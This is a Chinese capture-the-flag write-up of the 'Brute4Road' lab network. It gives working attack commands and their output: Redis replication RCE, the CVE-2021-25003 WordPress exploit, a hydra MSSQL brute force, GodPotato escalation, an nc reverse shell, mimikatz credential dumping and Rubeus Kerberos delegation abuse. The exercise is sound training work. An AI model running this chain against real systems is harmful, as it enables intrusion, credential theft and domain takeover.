靶标介绍

Brute4Road是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。

redis主从复制rce

39.98.110.96: [21 22 80 6379]
[+] ftp 39.98.110.96:21 anonymous 
[+] Redis 39.98.110.96:6379 unauthorized file:/usr/local/redis/db/dump.rdb
````
```bash
ftp> cd pub
250 Directory successfully changed.
ftp> ls -al
229 Entering Extended Passive Mode (|||59489|).
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Jun 09  2021 .
drwxr-xr-x    3 0        0            4096 Jun 10  2022 ..
226 Directory send OK.

ftp有个pub目录,但是没有东西,尝试利用redis

root@kali2 [/tmp] ➜  redis-cli -h 39.98.110.96 -p 6379                                  [13:16:45]
39.98.110.96:6379> info
# Server
redis_version:5.0.12

OGEAUg.png
尝试些定时任务反弹shell结果没有权限,于是尝试主从复制rce

root@VM-4-13-ubuntu:~/redis-rce# python3 redis-rce.py -r 39.98.110.96 -L 101.43.121.110 -f exp.so

█▄▄▄▄ ▄███▄   ██▄   ▄█    ▄▄▄▄▄       █▄▄▄▄ ▄█▄    ▄███▄   
█  ▄▀ █▀   ▀  █  █  ██   █     ▀▄     █  ▄▀ █▀ ▀▄  █▀   ▀  
█▀▀▌  ██▄▄    █   █ ██ ▄  ▀▀▀▀▄       █▀▀▌  █   ▀  ██▄▄    
█  █  █▄   ▄▀ █  █  ▐█  ▀▄▄▄▄▀        █  █  █▄  ▄▀ █▄   ▄▀ 
  █   ▀███▀   ███▀   ▐                  █   ▀███▀  ▀███▀   
 ▀                                     ▀                   


[*] Connecting to  39.98.110.96:6379...
[*] Sending SLAVEOF command to server
[+] Accepted connection from 39.98.110.96:6379
[*] Setting filename
[+] Accepted connection from 39.98.110.96:6379
[*] Start listening on 101.43.121.110:21000
[*] Tring to run payload
[+] Accepted connection from 39.98.110.96:33356
[*] Closing rogue server...

[+] What do u want ? [i]nteractive shell or [r]everse shell or [e]xit: i
[+] Interactive shell open , use "exit" to exit...
$ id
uid=1000(redis) gid=1000(redis) groups=1000(redis)

重下弹个shell尝试提权

[redis@centos-web01 flag]$ cat flag01 
cat: flag01: Permission denied
[redis@centos-web01 flag]$ find / -perm -4000 2>/dev/null
/usr/sbin/pam_timestamp_check
/usr/sbin/usernetctl
/usr/sbin/unix_chkpwd
/usr/bin/at
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chage
/usr/bin/base64
/usr/bin/umount
/usr/bin/su
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/crontab
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/pkexec

有个base64就可以任意读了

[redis@centos-web01 flag]$ base64 flag01  | base64 -d
 ██████                    ██              ██  ███████                           ██
░█░░░░██                  ░██             █░█ ░██░░░░██                         ░██
░█   ░██  ██████ ██   ██ ██████  █████   █ ░█ ░██   ░██   ██████   ██████       ░██
░██████  ░░██░░█░██  ░██░░░██░  ██░░░██ ██████░███████   ██░░░░██ ░░░░░░██   ██████
░█░░░░ ██ ░██ ░ ░██  ░██  ░██  ░███████░░░░░█ ░██░░░██  ░██   ░██  ███████  ██░░░██
░█    ░██ ░██   ░██  ░██  ░██  ░██░░░░     ░█ ░██  ░░██ ░██   ░██ ██░░░░██ ░██  ░██
░███████ ░███   ░░██████  ░░██ ░░██████    ░█ ░██   ░░██░░██████ ░░████████░░██████
░░░░░░░  ░░░     ░░░░░░    ░░   ░░░░░░     ░  ░░     ░░  ░░��░░░   ░░░░░░░░  ░░░░░░ 


flag01: flag{18452e8f-14b5-49d8-9780-8992f51660ab}

Congratulations! ! !
Guess where is the second flag?

CVE-2021-25003

扫一下内网

172.22.2.7: [21 22 80 6379] 外网
172.22.2.16: [80 135 139 445 1433]  MSSQLSERVER
172.22.2.34: [135 139 445] CLIENT01
172.22.2.3: [88 135 139 445] DC
172.22.2.18: [22 80 139 445] WORKGROUP\UBUNTU-WEB02 WordPress

看一下wordpress

root@kali2 [~] ➜  proxychains4 wpscan --url http://172.22.2.18/
```bash
[+] wpcargo
 | Location: http://172.22.2.18/wp-content/plugins/wpcargo/
 | Last Updated: 2024-08-08T17:00:00.000Z
 | [!] The version is out of date, the latest version is 7.0.6
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 6.x.x (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://172.22.2.18/wp-content/plugins/wpcargo/readme.txt

有个wpcargo插件,版本5.4.2
找到一个rce
https://patchstack.com/database/wordpress/plugin/wpcargo/vulnerability/wordpress-wpcargo-track-trace-plugin-6-8-9-unauthenticated-remote-code-execution-rce-vulnerability
https://github.com/biulove0x/CVE-2021-25003

root@kali2 [/tmp/CVE-2021-25003-main] ➜  proxychains4 python WpCargo.py -t  http://172.22.2.18/
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17

############################################
# @author : biulove0x                      #
# @name   : WP Plugins WPCargo Exploiter   #
# @cve    : CVE-2021-25003                 #
############################################

[proxychains] Strict chain  ...  101.43.121.110:7002  ...  172.22.2.18:80  ...  OK
[-] http://172.22.2.18/wp-content/wp-conf.php => Uploaded!

OGEAUg.png
拿到数据库密码

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| f1aagggghere       |
| information_schema |
| mysql              |
| performance_schema |
| sys                |
| wordpress          |
+--------------------+
6 rows in set (0.00 sec)

mysql> use f1aagggghere;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+--------------------------------+
| Tables_in_f1aagggghere         |
+--------------------------------+
| S0meth1ng_y0u_m1ght_1ntereSted |
| flag02                         |
+--------------------------------+
2 rows in set (0.00 sec)

mysql> select * from flag02;
+------+--------------------------------------------+
| id   | flag02                                     |
+------+--------------------------------------------+
|    1 | flag{c757e423-eb44-459c-9c63-7625009910d8} |
+------+--------------------------------------------+
1 row in set (0.00 sec)

拿到第二个flag,其中还给了一个表 里面全是密码

mysql> select * from S0meth1ng_y0u_m1ght_1ntereSted;
+-----+-----------+
| id  | pAssw0rd  |
+-----+-----------+
|   1 |  xDR6icFo |
|   2 |  lg4u3WsB |
|   3 |  6PoGQ2OZ |
|   4 |  2aq5dPNU |
|   5 |  S3DUMegA |
|   6 |  w9eXGrxa |
|   7 |  uTUdicIR |
|   8 |  VbI4Fjiy |

用来尝试爆破mssql密码

mssql爆破+potato提权

cat aaa| grep -o '| [^|]* | [^|]* |'| awk -F'|' '{print $3}' | sed 's/^[ \t]*//' | sed 's/[ \t]*$//'

爆破一下mssql,用户名默认是sa

root@kali2 [/tmp] ➜  proxychains4 -q hydra -l sa -P aaa 172.22.2.16 mssql -f 

[DATA] attacking mssql://172.22.2.16:1433/
[1433][mssql] host: 172.22.2.16   login: sa   password: ElGNkOiC

使用MDUT-Extend连接
OGEAUg.png
OGEtji.png
启用了SeImpersonatePrivilege权限,可以使用土豆提权,使用GodPotato
OGEDUX.png
OGEHyt.png
拿到sysstem权限,弹个shell

C:/Users/MSSQLSERVER/Desktop/GodPotato-NET4.exe  -cmd "C:/Users/MSSQLSERVER/Desktop/nc64.exe  172.22.2.7 4567 -e cmd"
````
```bash
 C:\Users\Administrator\flag ��Ŀ¼

2022/06/09  13:24    <DIR>          .
2022/06/09  13:24    <DIR>          ..
2025/02/05  13:11               460 flag03.txt
               1 ���ļ�            460 �ֽ�
               2 ��Ŀ¼ 25,279,700,992 �����ֽ�

C:\Users\Administrator\flag>type flag03.txt
type flag03.txt
8""""8                           88     8"""8                    
8    8   eeeee  e   e eeeee eeee 88     8   8  eeeee eeeee eeeee 
8eeee8ee 8   8  8   8   8   8    88  88 8eee8e 8  88 8   8 8   8 
88     8 8eee8e 8e  8   8e  8eee 88ee88 88   8 8   8 8eee8 8e  8 
88     8 88   8 88  8   88  88       88 88   8 8   8 88  8 88  8 
88eeeee8 88   8 88ee8   88  88ee     88 88   8 8eee8 88  8 88ee8 


flag03: flag{2a11695b-9402-4850-842d-ca8da65e81f2}

约束委派

使用mimikatz抓取哈希

C:/Users/MSSQLSERVER/Desktop/GodPotato-NET4.exe  -cmd "mimikatz.exe log privilege::Debug sekurlsa::logonpasswords exit"
msv :
        [00000003] Primary
        * Username : MSSQLSERVER$
        * Domain   : XIAORANG
        * NTLM     : 5289652e3b168881906180be61925ac4
        * SHA1     : 4e754413317d05dcf978e9731c808b47810c70a1

拿到mssqlserver哈希5289652e3b168881906180be61925ac4
传入sharphound分析域内关系
OGEHyt.png
mssqlserver对DC有约束委派的权限,可以使用S4U2self请求域控获取TGT

PS C:\Users\MSSQLSERVER\Desktop> Invoke-Rubeus -Command "dump /rc4:5289652e3b168881906180be61925ac4 /dc:DC.xiaorang.lab
/user:MSSQLSERVER$ /nowrap"

doIFujCCBbagAwIBBaEDAgEWooIEuzCCBLdhggSzMIIEr6ADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMWElBT1JBTkcuTEFCo4IEczCCBG+gAwIBEqEDAgECooIEYQSCBF0jZtYtYRstAFjBEV6CQ/UJf+cIOWrKHdcdP446b04g63RzrVUQqBPEvlJQQoJa0sO+ZtmFAB4+6+7u6Urdh4l7NW57zvSjZcqQpM37VNZPWXjx+GZd8JS2Vk2a+G4xOFq1JL8JwPyTqtr/bOSP9TdSZP5l7bydt3g4sUogOL5CgzeUoXMJBxNS2Jw1rfOh/os7t08O1RCiUYGLFRW6jXzar6UyPJ2f55HbPA19nGCJVe8P0g9edqOEH6Kl12LIzJgRxpAtywO3NnZLXl1CFLrr3kDX3qrkA1oTDfGJObkgLj1sq/w88g6BbmO/ngj+91IzArywwGhiLxIqpwHEVJ55wajrnBOSaDiC1jeKS4QyAG99xdSxeB20aYbZz6ie4yZBR/wXk8catn6dD7pVdqe/WVw2D3lIWvIY+eWpVt67/YNA9/jbN8DdrEXQ7sMpu6lx797shxn+ITLuuQx+C7caPEvqia/ueayEIwNF1UfXCam458cIsQ68obKl6negvJmF8YH8wxmtf/X5aGi0J+Mt+Pj9iIPoxHgfVjX9fml2Si87IErAaIK33dTMH09OVvbJru7cCYEiUqryVOF5n0ZXVZaFYwDTW6qO15a2+r3klgY+ZVc9g6gzNt9Ovw+sR9oe3CCnqOOAE6g+A9SHmnGkyPoxTXKI6it9KkZeKIhFg6bNBvDCi0VCCngBZTj9++rHfSS+pc3yPycO0huRmWu0sbWrosLlgzPyx19VW0kC9YoAAzrfrh5hvmDM6F/1/OuPfMyzCp46Hl1vKk2Gl9KrWYWHG09kZlCA8ydE/mFsounYoHPJ9b8G2GONf4OC9KmcIsj/klNgPJ6d+KtmKBX1EU5VrVY1b1yYToYD1fUIB5YUWVa63FZ5K79Jl8SUY2Pstyc1HZ54y7tqCwN/r7kjhazhqFBNQ3By/kKAi5Tv0Ut2W1CH8wcNqQxnqWUMG9UIihQ+MekNO79TvNbGWf3ciWOnHYXIM9gb0imzafva2+Bq+H3TyuAVsoHJu/9J/6ZeWFMYjem3ZnahpXxK2Wi0ciXoRqkL+84/qKfmG/aH1N5Q5RA94kIcpKCbz2IDogl0kJcx/OLsice6oMXiXrzRDp1WnrZ3ENb6o306KANSqI03TSZdeVRRgwwz48/doSSuaZiJYoX6ev7FCCUAvsP0hOENPNv/Cn4a8bAMMjX6PdeaTp1AIeFqvQEFtF4P1FX2ulDj0lA5B9SLaNu7w2OFN4PzUAtUle+bW4y7I4vRwYRHcIm2pK7By3RGfRbB+7j4U0Gs8X6c35deaARdXgvZU3TVDphoHAd2E5p9pYrZijcvO0zsUC58iwWF4GyanZAa5AW7Zvv6mMHQyVzvryEqd45SgXnx5wUHXWI4uqY8jdxLQyGDg1WnGDq1DIAF9R1ojYeSS7fcCgiu4BSieVXwD1yWVa1yOoz6/vmPyNZXZ4BBDV0oHHeY3xgRO1NMtjHgTTTpBwpa5bZDOVt7o4HqMIHnoAMCAQCigd8Egdx9gdkwgdaggdMwgdAwgc2gKzApoAMCARKhIgQgU0BfVufJHvccXbMdPcXrTze+cdB8aA579vzTpZRQJ0OhDhsMWElBT1JBTkcuTEFCohkwF6ADAgEBoRAwDhsMTVNTUUxTRVJWRVIkowcDBQBA4QAApREYDzIwMjUwMjA1MDgyNzE2WqYRGA8yMDI1MDIwNTE4MjcxNlqnERgPMjAyNTAyMTIwODI3MTZaqA4bDFhJQU9SQU5HLkxBQqkhMB+gAwIBAqEYMBYbBmtyYnRndBsMWElBT1JBTkcuTEFC

根据TGT请求域控上CIFS服务的TSG

Invoke-Rubeus -Command "s4u /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /dc:DC.xiaorang.lab /ticket:doIFujCCBbagAwIBBaEDAgEWooIEuzCCBLdhggSzMIIEr6ADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMWElBT1JBTkcuTEFCo4IEczCCBG+gAwIBEqEDAgECooIEYQSCBF0jZtYtYRstAFjBEV6CQ/UJf+cIOWrKHdcdP446b04g63RzrVUQqBPEvlJQQoJa0sO+ZtmFAB4+6+7u6Urdh4l7NW57zvSjZcqQpM37VNZPWXjx+GZd8JS2Vk2a+G4xOFq1JL8JwPyTqtr/bOSP9TdSZP5l7bydt3g4sUogOL5CgzeUoXMJBxNS2Jw1rfOh/os7t08O1RCiUYGLFRW6jXzar6UyPJ2f55HbPA19nGCJVe8P0g9edqOEH6Kl12LIzJgRxpAtywO3NnZLXl1CFLrr3kDX3qrkA1oTDfGJObkgLj1sq/w88g6BbmO/ngj+91IzArywwGhiLxIqpwHEVJ55wajrnBOSaDiC1jeKS4QyAG99xdSxeB20aYbZz6ie4yZBR/wXk8catn6dD7pVdqe/WVw2D3lIWvIY+eWpVt67/YNA9/jbN8DdrEXQ7sMpu6lx797shxn+ITLuuQx+C7caPEvqia/ueayEIwNF1UfXCam458cIsQ68obKl6negvJmF8YH8wxmtf/X5aGi0J+Mt+Pj9iIPoxHgfVjX9fml2Si87IErAaIK33dTMH09OVvbJru7cCYEiUqryVOF5n0ZXVZaFYwDTW6qO15a2+r3klgY+ZVc9g6gzNt9Ovw+sR9oe3CCnqOOAE6g+A9SHmnGkyPoxTXKI6it9KkZeKIhFg6bNBvDCi0VCCngBZTj9++rHfSS+pc3yPycO0huRmWu0sbWrosLlgzPyx19VW0kC9YoAAzrfrh5hvmDM6F/1/OuPfMyzCp46Hl1vKk2Gl9KrWYWHG09kZlCA8ydE/mFsounYoHPJ9b8G2GONf4OC9KmcIsj/klNgPJ6d+KtmKBX1EU5VrVY1b1yYToYD1fUIB5YUWVa63FZ5K79Jl8SUY2Pstyc1HZ54y7tqCwN/r7kjhazhqFBNQ3By/kKAi5Tv0Ut2W1CH8wcNqQxnqWUMG9UIihQ+MekNO79TvNbGWf3ciWOnHYXIM9gb0imzafva2+Bq+H3TyuAVsoHJu/9J/6ZeWFMYjem3ZnahpXxK2Wi0ciXoRqkL+84/qKfmG/aH1N5Q5RA94kIcpKCbz2IDogl0kJcx/OLsice6oMXiXrzRDp1WnrZ3ENb6o306KANSqI03TSZdeVRRgwwz48/doSSuaZiJYoX6ev7FCCUAvsP0hOENPNv/Cn4a8bAMMjX6PdeaTp1AIeFqvQEFtF4P1FX2ulDj0lA5B9SLaNu7w2OFN4PzUAtUle+bW4y7I4vRwYRHcIm2pK7By3RGfRbB+7j4U0Gs8X6c35deaARdXgvZU3TVDphoHAd2E5p9pYrZijcvO0zsUC58iwWF4GyanZAa5AW7Zvv6mMHQyVzvryEqd45SgXnx5wUHXWI4uqY8jdxLQyGDg1WnGDq1DIAF9R1ojYeSS7fcCgiu4BSieVXwD1yWVa1yOoz6/vmPyNZXZ4BBDV0oHHeY3xgRO1NMtjHgTTTpBwpa5bZDOVt7o4HqMIHnoAMCAQCigd8Egdx9gdkwgdaggdMwgdAwgc2gKzApoAMCARKhIgQgU0BfVufJHvccXbMdPcXrTze+cdB8aA579vzTpZRQJ0OhDhsMWElBT1JBTkcuTEFCohkwF6ADAgEBoRAwDhsMTVNTUUxTRVJWRVIkowcDBQBA4QAApREYDzIwMjUwMjA1MDgyNzE2WqYRGA8yMDI1MDIwNTE4MjcxNlqnERgPMjAyNTAyMTIwODI3MTZaqA4bDFhJQU9SQU5HLkxBQqkhMB+gAwIBAqEYMBYbBmtyYnRndBsMWElBT1JBTkcuTEFC /nowrap"

OGGPQI.png

传递ticket

Invoke-Rubeus -Command "createnetonly /program:c:\windows\system32\cmd.exe /show"

新开一个终端防止认证问题,然后注入票据

Invoke-Rubeus -Command "ptt /ticket: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"
PS C:\Users\hAcker\Desktop> type \\DC.xiaorang.lab\C$\users\administrator\flag\flag04.txt
 ######:                                               ###   ######:                             ##
 #######                         ##                   :###   #######                             ##
 ##   :##                        ##                  .####   ##   :##                            ##
 ##    ##   ##.####  ##    ##  #######    .####:     ##.##   ##    ##   .####.    :####     :###.##
 ##   :##   #######  ##    ##  #######   .######:   :#: ##   ##   :##  .######.   ######   :#######
 #######.   ###.     ##    ##    ##      ##:  :##  .##  ##   #######:  ###  ###   #:  :##  ###  ###
 #######.   ##       ##    ##    ##      ########  ##   ##   ######    ##.  .##    :#####  ##.  .##
 ##   :##   ##       ##    ##    ##      ########  ########  ##   ##.  ##    ##  .#######  ##    ##
 ##    ##   ##       ##    ##    ##      ##        ########  ##   ##   ##.  .##  ## .  ##  ##.  .##
 ##   :##   ##       ##:  ###    ##.     ###.  :#       ##   ##   :##  ###  ###  ##:  ###  ###  ###
 ########   ##        #######    #####   .#######       ##   ##    ##: .######.  ########  :#######
 ######     ##         ###.##    .####    .#####:       ##   ##    ###  .####.     ###.##   :###.##


Well done hacking!
This is the final flag, you deserve it!


flag04: flag{0721a46f-58e9-4a97-b840-4f5bdbcda55f}